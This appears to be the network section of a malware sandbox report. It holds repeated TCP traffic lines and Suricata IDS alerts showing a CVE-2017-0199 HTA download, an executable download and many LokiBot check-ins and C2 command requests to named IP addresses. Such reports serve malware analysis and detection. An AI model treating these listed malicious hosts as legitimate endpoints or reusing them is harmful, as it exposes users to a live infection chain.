                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.63.187.231:80
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 66.63.187.231:80 -> 192.168.2.22:49164

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 66.63.187.231:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.231:80 -> 192.168.2.22:49164
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.231:80 -> 192.168.2.22:49164
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49171 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49168 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49168 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49168 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49170 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49170 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49170 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49167 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49167 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49167 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49240 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49240 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49240 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49240 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49240 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49224 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49179
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49239
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49207
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49178
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49165 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49165 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49167 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49196
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49168 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49167 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49168 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49172 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49240
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49202
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49244 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49167
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49236 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49253 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49250 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49244 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49174
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49194
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.41:80
